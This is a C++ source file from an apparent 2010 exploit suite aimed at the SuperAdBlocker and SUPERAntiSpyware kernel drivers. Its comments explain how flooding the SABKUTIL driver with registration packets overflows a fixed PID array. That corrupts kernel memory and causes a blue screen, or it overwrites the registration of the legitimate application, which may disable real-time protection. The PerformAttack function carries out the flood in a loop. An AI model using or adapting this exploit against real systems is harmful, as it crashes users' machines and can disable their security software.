/*
* Copyright (c) 2010 by <milkovic.luka@gmail.com>
*
* SuperAdBlocker <= v4.6.1000 and SUPERAntiSpyware <= 4.34.1000 exploit suite
* --- by AelTHeGriN <aelthegrin@gmail.com> --- (Mar 2010)
*
*/

#include "StdAfx.h"
#include "DoSRegisteredProcesses.h"

DoSRegisteredProcesses::DoSRegisteredProcesses(boost::shared_ptr<IDriverConnector> driverConnector)
	: m_driverConnector(driverConnector), m_loopFlag(true)
{
	// intentionally left empty, for now
}

DoSRegisteredProcesses::~DoSRegisteredProcesses(void)
{
	// intentionally left empty, using boost smart pointers
}

bool DoSRegisteredProcesses::PerformAttack()
{
	// If user-mode application wants to communicate with SABKUTIL driver,
	// it first must register with the driver. Registration procedure involves
	// MD5 hash of current system time, along with some "custom" hash modifications.
	// This buffer is then sent to the driver, hashing procedure is repeated in the driver
	// and if hash values match, application which sent the packet is successfully registered
	// with SABKUTIL driver.
	// However, driver's DEVICE_EXTENSION has fixed 256-element array for storing PIDs of the processes
	// which are currently registered with the driver - sending more registration request successfully
	// overwrites the rest of the DEVICE_EXTENSION structure, and memory beyond it -> at certain point,
	// this will lead to BSOD (either because of access violation, usage of wrong values, etc.)
	//
	// MAYBE IT IS POSSIBLE TO CAUSE ARBITRARY CODE EXECUTION - overwriting the DEVICE_EXTENSION structure,
	// we also overwrite DEVICE_OBJECT structure, and all the pointers inside. However, value which will
	// be written is current process PID, which is not so easily controlled:(
	//
	// In SUPERAntiSpyware version 4.34.1000 array cannot be overflowed, but it can be overwritten!
	// Once this array is overwritten, initially successfully registered SAS application is not registered anymore,
	// and all requests will fail. Consequences of such "application hijack" are not obvious - free version was
	// used for testing, but professional version has real-time protection which could stop working.

	// first, open device handle and send (first) registration packet to the driver
	if(!m_driverConnector->InitializeDriver())
	{
		return false;
	}

	// register this process with the driver forever (successfully overwriting the memory:)), or only once if flag says so
	do
	{
		if(!m_driverConnector->SendRegistrationPacket())
		{
			return false;
		}
	} while(m_loopFlag);
	
	return true;
}